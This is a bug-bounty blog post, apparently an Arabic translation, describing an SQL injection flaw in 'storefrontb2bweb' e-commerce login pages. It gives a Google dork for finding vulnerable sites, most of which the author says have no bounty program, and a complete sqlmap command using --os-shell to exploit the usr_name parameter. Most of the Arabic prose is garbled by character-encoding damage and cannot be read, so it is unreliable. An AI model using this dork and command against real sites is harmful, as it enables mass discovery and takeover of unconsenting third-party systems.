I"<p><img src="/images/blog/002/main.png" alt="Username" /></p>

<p>ูุบูู ุงูุนุฏูุฏ ูู ุงููุงุณ ุงูุฐูู ูุนูููู ูู ูุฌุงู (Bug Bounty ุงูุฅุจูุงุบ ุนู ุงูุซุบุฑุงุช) ุนู ุฃูููุฉ ุฅุณุชุฎุฏุงู (Google Dorks) ููู ุชูููู ุจุญุซ ูุชูุฏู ูุณุงุนุฏู ุนูู ุฅูุฌุงุฏ ุงููุนูููุงุช ุงูุชู ุนุงุฏุชุง ูุฏ ูุง ุชุฌุฏูุง ุจุณูููุฉ ูู ุงููููุน ุงูุฅูููุชุฑููู .</p>

<p>ููุณูู ุฃุฎุฑ ู (Google Dork) ูู (Google Hacking) ูุงูุฐู ูุนูู ุฃูุถุง ุฅูุฌุงุฏ ูุนูููุงุช ูู ุงูุตุนุจ ุงููุตูู ุฅูููุง ุจูุฌุฑุฏ ุฅุณุชุฎุฏุงู ูููุฉ ุจุญุซ ุจุณูุทุฉ ูู ูุญุฑู ุงูุจุญุซ ูููููู ุงูุฅุทูุงุน ุฃูุซุฑ ุนู ูุฐุง ุงูููุถูุน <a href="https://whatis.techtarget.com/definition/Google-dork-query">ูู ููุง</a></p>

<p>ููุฎุฑููุง ุนุซุฑุช ุนูู (Google Dork) ููููู ูู ุงูุนุซูุฑ ุนูู ููุงูุน ุชุฌุงุฑูุฉ ูุตุงุจุฉ ุจุซุบุฑุฉ (SQL Injection)<br />
ูุงูููุชุดู ุงูุฃุตูู ููุฐู ุงูุทุฑููุฉ ูู ูุฎุชุจุฑ ุฅุฎุชุฑุงู ุจุฅุณู ratboy.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>inurl:storefrontb2bweb
</code></pre></div></div>
<p>ุจูุฌุฑุฏ ูุชุงุจุฉ ูุฐู ุงูุฌููุฉ ูู ูุญุฑู ุงูุจุญุซ ูุฌุฏ ุฃูู ููุงู 4 ุตูุญ ูู ุงููุชุงุฆุฌ ูููู ููุฃุณู ุฃุบูุจ ุงูููุงูุน ุงููุตุงุจุฉ ุจุงูุซุบุฑุฉ ูุง ุชูุชูู (ุจุฑูุงูุฌ ุฅุจูุงุบ ุนู ุซุบุฑุงุช Bug Bounty Program).<br />
ูููู ูุญุณู ุงูุญุธ ูุฌุฏุช ูููุน ูู ุชูู ุงูููุงูุน ููุชูู (ุจุฑูุงูุฌ ุฅุจูุงุบ ุนู ุซุบุฑุงุช Bug Bounty Program).<br />
ูุงู(Parameter) ุงููุตุงุจ ูู (username parameter) ุงูุฐู ูุฑุฌุน ุฎุทุฃ (SQL) ุนูุฏูุง ูุณุชุฎุฏู (ุนูุงูุฉ ุฅูุชุจุงุณ Single Quotation).</p>

<p><img src="/images/blog/002/2.jpeg" alt="Username" /></p>

<p>ูููููุง ุฅุณุชุบูุงู ุชูู ุงูุซุบุฑุฉ ุจุฅุณุชุฎุฏุงู ุฃุฏุงุฉ SQLMAP</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python sqlmap.py -u"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&amp;action=prepare_forgot&amp;login=true&amp;usr_name=foo"
-p usr_name --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
</code></pre></div></div>
<p>ูููููุง ุฅุตูุงุญ ุชูู ุงูุซุบุฑุฉ ุนู ุทุฑูู (ุงูุชุฃูุฏ ูู ุงููุฏุฎูุงุช User Input Validation)</p>

<p>ุนูุฏูุง ุฃุจูุบุช ุนู ูุฐู ุงูุซุบุฑุฉ ุฏุฎูุช ููุญุฉ ุงูุดุฑู. ูููุชูู ุฃููู ุฃู ูู ุงูุดุฑูุงุช ุงููุตุงุจุฉ ุจูุฐู ุงูุซุบุฑุงุช ุชุฃุฎุฐ ุงูุฎุทูุงุช ุงููุงุฒูุฉ ูุฅุตูุงุญ ูุฐู ุงููุดููุฉ ูุงูุฃูู ูู ุฅูุฌุงุฏ ูุณููุฉ ููุฅุจูุงุบ ุนููุง ุฅุฐุง ูุฌุฏุช</p>

<p><strong>ุฅุณู ุงููุงุชุจ :</strong> <a href="https://twitter.com/mase289">Jadek Mark</a><br />
<strong>ุฅุณู ุงููุชุฑุฌู :</strong> <a href="https://muhammadnasef.com/">ูุญูุฏ ูุงุตู</a><br />
<strong>ุชุงุฑูุฎ ุงููุดุฑ :</strong> 15 ูุจุฑุงูุฑ 2021<br />
<strong>ุฑุงุจุท ุงูููุงูุฉ ุงูุฃุตููุฉ :</strong> <a href="https://bit.ly/2Mpmf4T">ูู ููุง</a></p>
:ET